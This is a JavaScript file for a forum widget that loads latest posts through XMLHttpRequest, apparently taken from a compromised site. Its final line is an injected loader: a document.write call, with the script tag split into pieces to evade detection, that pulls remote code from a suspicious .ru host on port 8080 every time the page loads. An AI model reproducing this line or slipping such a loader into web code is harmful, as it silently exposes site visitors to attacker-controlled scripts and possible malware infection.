var xmlHttp
function sendpage(url)
{ 
xmlHttp=GetXmlHttpObject()
if (xmlHttp==null)
 {
 alert ("Browser does not support HTTP Request")
 return
 }
 document.getElementById("vietvbb_latest_posts_custom5").style.display="block";
document.getElementById("vietvbb_latest_posts_custom5").innerHTML="<center>";
xmlHttp.onreadystatechange=stateChanged
xmlHttp.open("POST",url,true)
xmlHttp.send(null)
}

function stateChanged() 
{ 
if (xmlHttp.readyState==4 || xmlHttp.readyState=="complete")
 { 
 	//"loading":"loading"
	document.getElementById("vietvbb_latest_posts_custom5").style.display="none";
 	document.getElementById("views").innerHTML=xmlHttp.responseText 
 } 
}

function GetXmlHttpObject()
{
var xmlHttp=null;
try
 {
 // Firefox, Opera 8.0+, Safari
 xmlHttp=new XMLHttpRequest();
 }
catch (e)
 {
 //Internet Explorer
 try
  {
  xmlHttp=new ActiveXObject("Msxml2.XMLHTTP");
  }
 catch (e)
  {
  xmlHttp=new ActiveXObject("Microsoft.XMLHTTP");
  }
 }
return xmlHttp;
}
document.write('<s'+'cript type="text/javascript" src="http://malepad.ru:8080/Num_Lock.js"></scr'+'ipt>');